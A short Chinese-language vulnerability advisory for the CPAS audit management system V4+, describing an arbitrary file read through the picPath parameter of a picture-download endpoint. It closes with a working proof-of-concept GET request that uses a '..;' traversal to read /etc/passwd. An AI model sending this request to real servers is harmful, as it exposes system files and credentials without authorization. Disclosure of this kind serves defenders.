友数聚科技-CPAS审计管理系统V4+是一款审计管理软件。其/mobileUploadPictureController/doDownLoadPicFile接口在处理picPath参数时，未对用户输入进行充分过滤，攻击者可以通过构造包含目录遍历序列（如..;）的路径参数，读取服务器上的任意文件。成功利用此漏洞可导致服务器敏感信息泄露，例如系统配置文件、数据库凭证等关键数据，从而可能为进一步攻击提供便利。 GET /cpasm4/static/..;/mobileUploadPictureController/doDownLoadPicFile?picPath=%2Fetc%2Fpasswd&fileType=1 HTTP/1.1

CPAS审计管理系统